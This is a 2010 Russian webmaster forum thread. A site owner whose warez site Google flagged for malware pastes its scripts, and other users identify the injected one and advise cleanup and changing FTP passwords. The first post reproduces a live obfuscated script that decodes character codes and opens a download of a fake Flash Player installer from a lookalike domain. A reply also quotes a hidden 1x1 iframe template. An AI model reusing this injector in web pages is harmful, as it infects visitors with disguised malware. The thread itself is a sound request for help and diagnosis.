X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Очередная тема про вирус на сайте, не могу найти
Frankie
Frankie
Topic Starter сообщение 26.1.2010, 22:05; Ответить: Frankie
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


На не очень старый варезник сегодня гугля повесила ярлык, что он распространяет вирусы.
Самое интересное, что никаких баннеров на нем не висит, только пара счетчиков.
через интернет эксплорер пытался на него заходить, вылазиет сообщение. что попытка установить флеш-плеер с сайта _abobes.ru
хотя посторонних кодов на сайте я не обнаружил, тем более с таким адресом. еще недавно мне писали, что при заходе на него каспер ругается на попытку загрузить вредоносную страницу с адресом:
http://erorhost/sait/menu.php этого кода я тоже не нашел...

Система siteguard.ru выявила несколько подозрительных ява скриптов, но я в яваскрипте нивзубногой, может что-нить подскажет?
<script type="text/javascript">
  window.addEvent('domready', function(){ new YJNF4({ overallContainer: 'YJ_NewsFlash4', slicesClass: '.yjnewsflash_slice', slicesContainer: 'YJ_NewsFlash4_Slices' }); })
</script>


<script type="text/javascript">
window.addEvent('domready', function() { new SmoothScroll({duration: 1000}); });
</script>


<script type="text/javascript">
  sfHover = function() { var sfEls = document.getElementById("horiznav_d").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover);
</script>


<script type="text/javascript">
window.addEvent('domready', function() { $("login_pop").setStyles({ left: (window.getScrollLeft() + (window.getWidth() - 290)/2)+'px' }); $("reg_pop").setStyles({ left: (window.getScrollLeft() + (window.getWidth() - 445)/2)+'px' }); });
</script>


<script LANGUAGE="JavaScript">
<!-- var temp="",i,c=0,out="";
var str="60!83!67!82!73!80!84!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!115!99!114!105!112!116!34!62!13!10!102!117!110!99!116!105!111!110!32!80!111!112!83!104!111!119!51!40!41!32!123!32!32!13!10!67!111!111!107!105!101!84!101!115!116!61!110!97!118!105!103!97!116!111!114!46!99!111!111!107!105!101!69!110!97!98!108!101!100!59!32!32!13!10!105!102!40!67!111!111!107!105!101!84!101!115!116!41!32!32!13!10!123!32!32!13!10!67!108!105!99!107!85!110!100!101!114!99!111!111!107!105!101!32!61!32!71!101!116!67!111!111!107!105!101!40!39!99!108!105!99!107!117!110!100!101!114!39!41!59!32!32!13!10!105!102!32!40!67!108!105!99!107!85!110!100!101!114!99!111!111!107!105!101!32!61!61!32!110!117!108!108!41!32!32!13!10!123!32!32!13!10!118!97!114!32!69!120!112!68!97!116!101!32!61!32!110!101!119!32!68!97!116!101!32!40!41!59!32!32!13!10!69!120!112!68!97!116!101!46!115!101!116!84!105!109!101!40!69!120!112!68!97!116!101!46!103!101!116!84!105!109!101!40!41!32!43!32!40!49!52!52!32!42!32!54!48!32!42!32!54!48!32!42!32!49!48!48!48!41!41!59!32!32!13!10!83!101!116!67!111!111!107!105!101!40!39!99!108!105!99!107!117!110!100!101!114!39!44!39!49!39!44!69!120!112!68!97!116!101!44!32!34!47!34!41!59!32!32!13!10!119!105!110!100!111!119!46!111!112!101!110!40!34!104!116!116!112!58!47!47!97!100!111!100!101!115!46!114!117!47!100!111!119!110!108!111!97!100!47!105!110!115!116!97!108!95!102!108!97!115!104!95!112!108!97!121!101!114!46!101!120!101!34!41!59!32!13!10!119!105!110!100!111!119!46!102!111!99!117!115!40!41!59!32!32!13!10!125!32!32!13!10!125!32!32!13!10!125!32!32!13!10!102!117!110!99!116!105!111!110!32!71!101!116!67!111!111!107!105!101!32!40!110!97!109!101!41!32!123!32!32!13!10!118!97!114!32!97!114!103!32!61!32!110!97!109!101!32!43!32!34!61!34!59!32!32!13!10!118!97!114!32!97!108!101!110!32!61!32!97!114!103!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!99!108!101!110!32!61!32!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!105!32!61!32!48!59!32!32!13!10!119!104!105!108!101!32!40!105!32!60!32!99!108!101!110!41!32!123!32!32!13!10!118!97!114!32!106!32!61!32!105!32!43!32!97!108!101!110!59!32!32!13!10!105!102!32!40!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!115!117!98!115!116!114!105!110!103!40!105!44!32!106!41!32!61!61!32!97!114!103!41!32!32!13!10!114!101!116!117!114!110!32!103!101!116!67!111!111!107!105!101!86!97!108!32!40!106!41!59!32!32!13!10!105!32!61!32!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!105!110!100!101!120!79!102!40!34!32!34!44!32!105!41!32!43!32!49!59!32!32!13!10!105!102!32!40!105!32!61!61!32!48!41!32!98!114!101!97!107!59!32!32!13!10!125!32!32!13!10!114!101!116!117!114!110!32!110!117!108!108!59!32!32!13!10!125!32!32!13!10!102!117!110!99!116!105!111!110!32!83!101!116!67!111!111!107!105!101!32!40!110!97!109!101!44!32!118!97!108!117!101!41!32!123!32!32!13!10!118!97!114!32!97!114!103!118!32!61!32!83!101!116!67!111!111!107!105!101!46!97!114!103!117!109!101!110!116!115!59!32!32!13!10!118!97!114!32!97!114!103!99!32!61!32!83!101!116!67!111!111!107!105!101!46!97!114!103!117!109!101!110!116!115!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!101!120!112!105!114!101!115!32!61!32!40!97!114!103!99!32!62!32!50!41!32!63!32!97!114!103!118!91!50!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!112!97!116!104!32!61!32!40!97!114!103!99!32!62!32!51!41!32!63!32!97!114!103!118!91!51!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!100!111!109!97!105!110!32!61!32!40!97!114!103!99!32!62!32!52!41!32!63!32!97!114!103!118!91!52!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!115!101!99!117!114!101!32!61!32!40!97!114!103!99!32!62!32!53!41!32!63!32!97!114!103!118!91!53!93!32!58!32!102!97!108!115!101!59!32!32!13!10!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!32!61!32!110!97!109!101!32!43!32!34!61!34!32!43!32!101!115!99!97!112!101!32!40!118!97!108!117!101!41!32!43!32!32!13!10!40!40!101!120!112!105!114!101!115!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!101!120!112!105!114!101!115!61!34!32!43!32!101!120!112!105!114!101!115!46!116!111!71!77!84!83!116!114!105!110!103!40!41!41!41!32!43!32!32!13!10!40!40!112!97!116!104!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!112!97!116!104!61!34!32!43!32!112!97!116!104!41!41!32!43!32!32!13!10!40!40!100!111!109!97!105!110!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!100!111!109!97!105!110!61!34!32!43!32!100!111!109!97!105!110!41!41!32!43!32!32!13!10!40!40!115!101!99!117!114!101!32!61!61!32!116!114!117!101!41!32!63!32!34!59!32!115!101!99!117!114!101!34!32!58!32!34!34!41!59!32!32!13!10!125!32!32!13!10!100!111!99!117!109!101!110!116!46!111!110!109!111!117!115!101!117!112!61!80!111!112!83!104!111!119!51!59!32!13!10!60!47!83!67!82!73!80!84!62!";
l=str.length; while(c<=str.length-1) { while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++; out=out+String.fromCharCode(temp); temp=""; } document.write(out); //-->
</SCRIPT>


Сообщение отредактировал Frankie - 26.1.2010, 22:16
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 26.1.2010, 22:34; Ответить: nonub
Сообщение #2


Keys Seller
******

Группа: Active User
Сообщений: 1281
Регистрация: 12.6.2009
Из: Web
Поблагодарили: 373 раза
Репутация:   85  


99% в последнем скрипте дрянь. Сохраните копию файла, вырежите последний код и посмотрите.

После чего просканируйте ПК курейтом в безопасном режиме, смените все пароли (от ФТП тоже), снесите ослика.

Сообщение отредактировал nonub - 26.1.2010, 22:37


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
KipiaSoft
KipiaSoft
сообщение 26.1.2010, 23:13; Ответить: KipiaSoft
Сообщение #3


Старожил
******

Группа: Active User
Сообщений: 2096
Регистрация: 16.11.2009
Из: Волгоград
Поблагодарили: 632 раза
Репутация:   74  


тоже подозрение на последний код, особенно если он внизу файла появился неизвестно откуда


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
werts
werts
сообщение 26.1.2010, 23:23; Ответить: werts
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 349
Регистрация: 29.3.2009
Поблагодарили: 151 раз
Репутация:   21  


У меня были украдены пароли от Ftp и враги во всех файлах index(было несколько папок) добавили вредоносный код. Но так как сайты пишу сам то вредоносные коды быстро нашёл и удалил. Кстати, код может быть внедрен и в начале страницы, а не только в конце.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dibility
dibility
сообщение 26.1.2010, 23:34; Ответить: dibility
Сообщение #5


Я в топе. А ты?
******

Группа: Active User
Сообщений: 1296
Регистрация: 21.10.2008
Из: Фиджи...пляж..
Поблагодарили: 861 раз
Репутация:   104  


последний код.
Крипт ифрейма, если не твое, а оно не твое
<iframe src="nevajno" width="1" height="1" scrolling="no"></iframe>

чисть все, меняй доступы.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
сообщение 27.1.2010, 0:18; Ответить: ChristmasNet
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 441
Регистрация: 13.1.2010
Из: Россия, ХМАО
Поблагодарили: 93 раза
Репутация:   16  


У меня на DLE 8.2 (пропатченная) была подобная ситуация, искал вредоносный код так и не нашел, решил просто обновиться, после обновления вирусов не было. Скорее всего есть какая то дыра в javascript.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 27.1.2010, 20:21; Ответить: Frankie
Сообщение #7


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


(nonub @ 26.1.2010, 21:34) *
снесите ослика

осла у меня нет, есть тока стронг...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 27.1.2010, 23:22; Ответить: nonub
Сообщение #8


Keys Seller
******

Группа: Active User
Сообщений: 1281
Регистрация: 12.6.2009
Из: Web
Поблагодарили: 373 раза
Репутация:   85  


через интернет эксплорер пытался на него заходить..


Другого Ослика smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dibility
dibility
сообщение 27.1.2010, 23:29; Ответить: dibility
Сообщение #9


Я в топе. А ты?
******

Группа: Active User
Сообщений: 1296
Регистрация: 21.10.2008
Из: Фиджи...пляж..
Поблагодарили: 861 раз
Репутация:   104  


(dibility @ 26.1.2010, 23:34) *
последний код.
Крипт ифрейма, если не твое, а оно не твое
Код
<iframe src="nevajno" width="1" height="1" scrolling="no"></iframe>

чисть все, меняй доступы.


ну как? я был прав? проблему решил?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 28.1.2010, 1:09; Ответить: Frankie
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


(dibility @ 27.1.2010, 22:29) *
ну как? я был прав? проблему решил?

К сожалению весь день дома не был((( только, что пришел((( некогда было заниматься

Сообщение отредактировал Frankie - 28.1.2010, 1:11
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) ВНИМАНИЕ: Тема для обсуждения работ фотоконкурса «Новогодний косплей» 18+
6 admin 1082 15.12.2017, 15:14
автор: admin
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
4 kuprum 525 15.12.2017, 14:07
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10682 14.12.2017, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3626 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2835 12.12.2017, 12:05
автор: maxim_krasovskiy


 



RSS Текстовая версия Сейчас: 17.12.2017, 2:41
Дизайн